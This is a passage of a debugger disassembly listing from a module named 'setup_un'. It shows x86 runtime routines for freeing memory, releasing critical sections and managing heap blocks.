004019AF . A1 CCF54000 MOV EAX,DWORD PTR DS:[40F5CC]
004019B4 . 85C0 TEST EAX,EAX
004019B6 . 74 17 JE SHORT setup_un.004019CF
004019B8 > 8B10 MOV EDX,DWORD PTR DS:[EAX]
004019BA . 8915 CCF54000 MOV DWORD PTR DS:[40F5CC],EDX
004019C0 . 50 PUSH EAX ; /hMemory
004019C1 . E8 D6F7FFFF CALL <JMP.&kernel32.LocalFree> ; \LocalFree
004019C6 . A1 CCF54000 MOV EAX,DWORD PTR DS:[40F5CC]
004019CB . 85C0 TEST EAX,EAX
004019CD .^ 75 E9 JNZ SHORT setup_un.004019B8
004019CF > 33C0 XOR EAX,EAX
004019D1 . 5A POP EDX
004019D2 . 59 POP ECX
004019D3 . 59 POP ECX
004019D4 . 64:8910 MOV DWORD PTR FS:[EAX],EDX
004019D7 . 68 011A4000 PUSH setup_un.00401A01
004019DC > 803D 35F04000>CMP BYTE PTR DS:[40F035],0
004019E3 . 74 0A JE SHORT setup_un.004019EF
004019E5 . 68 B4F54000 PUSH setup_un.0040F5B4 ; /pCriticalSection = setup_un.0040F5B4
004019EA . E8 D5F7FFFF CALL <JMP.&kernel32.LeaveCriticalSection>; \LeaveCriticalSection
004019EF > 68 B4F54000 PUSH setup_un.0040F5B4 ; /pCriticalSection = setup_un.0040F5B4
004019F4 . E8 D3F7FFFF CALL <JMP.&kernel32.DeleteCriticalSectio>; \DeleteCriticalSection
004019F9 . C3 RETN
004019FA . E9 651C0000 JMP setup_un.00403664
004019FF .^ EB DB JMP SHORT setup_un.004019DC
00401A01 > 5B POP EBX
00401A02 . 5D POP EBP
00401A03 . C3 RETN
00401A04 /$ 53 PUSH EBX
00401A05 |. 3B05 00F64000 CMP EAX,DWORD PTR DS:[40F600]
00401A0B |. 75 09 JNZ SHORT setup_un.00401A16
00401A0D |. 8B50 04 MOV EDX,DWORD PTR DS:[EAX+4]
00401A10 |. 8915 00F64000 MOV DWORD PTR DS:[40F600],EDX
00401A16 |> 8B50 04 MOV EDX,DWORD PTR DS:[EAX+4]
00401A19 |. 8B48 08 MOV ECX,DWORD PTR DS:[EAX+8]
00401A1C |. 81F9 00100000 CMP ECX,1000
00401A22 |. 7F 38 JG SHORT setup_un.00401A5C
00401A24 |. 3BC2 CMP EAX,EDX
00401A26 |. 75 17 JNZ SHORT setup_un.00401A3F
00401A28 |. 85C9 TEST ECX,ECX
00401A2A |. 79 03 JNS SHORT setup_un.00401A2F
00401A2C |. 83C1 03 ADD ECX,3
00401A2F |> C1F9 02 SAR ECX,2
00401A32 |. A1 0CF64000 MOV EAX,DWORD PTR DS:[40F60C]
00401A37 |. 33D2 XOR EDX,EDX
00401A39 |. 895488 F4 MOV DWORD PTR DS:[EAX+ECX*4-C],EDX
00401A3D |. EB 24 JMP SHORT setup_un.00401A63
00401A3F |> 85C9 TEST ECX,ECX
00401A41 |. 79 03 JNS SHORT setup_un.00401A46
00401A43 |. 83C1 03 ADD ECX,3
00401A46 |> C1F9 02 SAR ECX,2
00401A49 |. 8B1D 0CF64000 MOV EBX,DWORD PTR DS:[40F60C]
00401A4F |. 89548B F4 MOV DWORD PTR DS:[EBX+ECX*4-C],EDX
00401A53 |. 8B00 MOV EAX,DWORD PTR DS:[EAX]
00401A55 |. 8902 MOV DWORD PTR DS:[EDX],EAX
00401A57 |. 8950 04 MOV DWORD PTR DS:[EAX+4],EDX
00401A5A |. 5B POP EBX
00401A5B |. C3 RETN
00401A5C |> 8B00 MOV EAX,DWORD PTR DS:[EAX]
00401A5E |. 8902 MOV DWORD PTR DS:[EDX],EAX
00401A60 |. 8950 04 MOV DWORD PTR DS:[EAX+4],EDX
00401A63 |> 5B POP EBX
00401A64 \. C3 RETN
00401A65 8D40 00 LEA EAX,DWORD PTR DS:[EAX]
00401A68 /$ 8B15 10F64000 MOV EDX,DWORD PTR DS:[40F610]
00401A6E |. EB 10 JMP SHORT setup_un.00401A80
00401A70 |> 8B4A 08 /MOV ECX,DWORD PTR DS:[EDX+8]
00401A73 |. 3BC1 |CMP EAX,ECX
00401A75 |. 72 07 |JB SHORT setup_un.00401A7E
00401A77 |. 034A 0C |ADD ECX,DWORD PTR DS:[EDX+C]
00401A7A |. 3BC1 |CMP EAX,ECX
00401A7C |. 72 16 |JB SHORT setup_un.00401A94
00401A7E |> 8B12 |MOV EDX,DWORD PTR DS:[EDX]
00401A80 |> 81FA 10F64000 CMP EDX,setup_un.0040F610
00401A86 |.^ 75 E8 \JNZ SHORT setup_un.00401A70
00401A88 |. C705 B0F54000>MOV DWORD PTR DS:[40F5B0],3
00401A92 |. 33D2 XOR EDX,EDX
00401A94 |> 8BC2 MOV EAX,EDX
00401A96 \. C3 RETN
00401A97 90 NOP
00401A98 /$ 53 PUSH EBX
00401A99 |. 8BCA MOV ECX,EDX
00401A9B |. 83E9 04 SUB ECX,4
00401A9E |. 8D1C01 LEA EBX,DWORD PTR DS:[ECX+EAX]
00401AA1 |. 83FA 10 CMP EDX,10
00401AA4 |. 7C 0F JL SHORT setup_un.00401AB5
00401AA6 |. C703 07000080 MOV DWORD PTR DS:[EBX],80000007
00401AAC |. 8BD1 MOV EDX,ECX
00401AAE |. E8 B9010000 CALL setup_un.00401C6C
00401AB3 |. 5B POP EBX
00401AB4 |. C3 RETN
00401AB5 |> 83FA 04 CMP EDX,4
00401AB8 |. 7C 0C JL SHORT setup_un.00401AC6
00401ABA |. 8BCA MOV ECX,EDX
00401ABC |. 81C9 02000080 OR ECX,80000002
00401AC2 |. 8908 MOV DWORD PTR DS:[EAX],ECX
00401AC4 |. 890B MOV DWORD PTR DS:[EBX],ECX
00401AC6 |> 5B POP EBX
00401AC7 \. C3 RETN
00401AC8 /$ FF05 9CF54000 INC DWORD PTR DS:[40F59C]
00401ACE |. 8BD0 MOV EDX,EAX
00401AD0 |. 83EA 04 SUB EDX,4
00401AD3 |. 8B12 MOV EDX,DWORD PTR DS:[EDX]
00401AD5 |. 81E2 FCFFFF7F AND EDX,7FFFFFFC
00401ADB |. 83EA 04 SUB EDX,4
00401ADE |. 0115 A0F54000 ADD DWORD PTR DS:[40F5A0],EDX
00401AE4 |. E8 F3050000 CALL setup_un.004020DC
00401AE9 \. C3 RETN
00401AEA 8BC0 MOV EAX,EAX
00401AEC /$ 83FA 0C CMP EDX,0C
00401AEF |. 7C 0E JL SHORT setup_un.00401AFF
00401AF1 |. 83CA 02 OR EDX,2
00401AF4 |. 8910 MOV DWORD PTR DS:[EAX],EDX
00401AF6 |. 83C0 04 ADD EAX,4
00401AF9 |. E8 CAFFFFFF CALL setup_un.00401AC8
00401AFE |. C3 RETN
00401AFF |> 83FA 04 CMP EDX,4
00401B02 |. 7C 0A JL SHORT setup_un.00401B0E
00401B04 |. 8BCA MOV ECX,EDX
00401B06 |. 81C9 02000080 OR ECX,80000002
00401B0C |. 8908 MOV DWORD PTR DS:[EAX],ECX
00401B0E |> 03C2 ADD EAX,EDX
00401B10 |. 8320 FE AND DWORD PTR DS:[EAX],FFFFFFFE
00401B13 \. C3 RETN
00401B14 /$ 53 PUSH EBX
00401B15 |. 56 PUSH ESI
00401B16 |. 8BD0 MOV EDX,EAX
00401B18 |. 83EA 04 SUB EDX,4
00401B1B |. 8B12 MOV EDX,DWORD PTR DS:[EDX]
00401B1D |. 8BCA MOV ECX,EDX
00401B1F |. 81E1 02000080 AND ECX,80000002
00401B25 |. 81F9 02000080 CMP ECX,80000002
00401B2B |. 74 0A JE SHORT setup_un.00401B37
00401B2D |. C705 B0F54000>MOV DWORD PTR DS:[40F5B0],4
00401B37 |> 8BDA MOV EBX,EDX
00401B39 |. 81E3 FCFFFF7F AND EBX,7FFFFFFC
00401B3F |. 2BC3 SUB EAX,EBX
00401B41 |. 8BC8 MOV ECX,EAX
00401B43 |. 3311 XOR EDX,DWORD PTR DS:[ECX]
00401B45 |. F7C2 FEFFFFFF TEST EDX,FFFFFFFE
00401B4B |. 74 0A JE SHORT setup_un.00401B57
00401B4D |. C705 B0F54000>MOV DWORD PTR DS:[40F5B0],5
00401B57 |> F601 01 TEST BYTE PTR DS:[ECX],1
00401B5A |. 74 20 JE SHORT setup_un.00401B7C
00401B5C |. 8BD0 MOV EDX,EAX
00401B5E |. 83EA 0C SUB EDX,0C
00401B61 |. 8B72 08 MOV ESI,DWORD PTR DS:[EDX+8]
00401B64 |. 2BC6 SUB EAX,ESI
00401B66&nb
